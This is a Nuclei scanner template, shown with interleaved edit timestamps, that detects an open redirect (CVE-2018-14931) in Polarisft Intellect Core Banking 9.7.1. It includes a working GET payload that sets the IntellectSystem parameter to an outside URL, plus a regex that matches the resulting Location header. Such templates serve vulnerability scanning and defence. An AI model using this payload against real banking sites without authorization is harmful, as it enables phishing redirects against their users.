2022-04-18 08:33:41 +00:00
id : CVE-2018-14931
info :
2022-04-18 09:34:00 +00:00
name : Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect
2022-04-18 08:33:41 +00:00
author : 0x_Akoko
2022-05-17 09:18:12 +00:00
severity : medium
description : Polarisft Intellect Core Banking Software Version 9.7.1 is susceptible to an open redirect issue in the Core and Portal modules via the /IntellectMain.jsp?IntellectSystem= URI.
2022-04-18 08:33:41 +00:00
reference :
- https://neetech18.blogspot.com/2019/03/polaris-intellect-core-banking-software_31.html
2022-09-23 17:53:08 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-14931
2022-04-18 08:33:41 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-04-18 08:33:41 +00:00
cve-id : CVE-2018-14931
cwe-id : CWE-601
2022-04-18 09:34:00 +00:00
tags : cve,cve2018,redirect,polarisft,intellect
2022-04-18 08:33:41 +00:00
requests :
- method : GET
path :
2022-06-06 10:40:15 +00:00
- '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh'
2022-04-18 08:33:41 +00:00
matchers :
- type : regex
part : header
2022-04-18 09:34:00 +00:00
regex :
2022-06-06 10:40:15 +00:00
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
2022-04-29 19:58:07 +00:00
# Enhanced by mp on 2022/04/26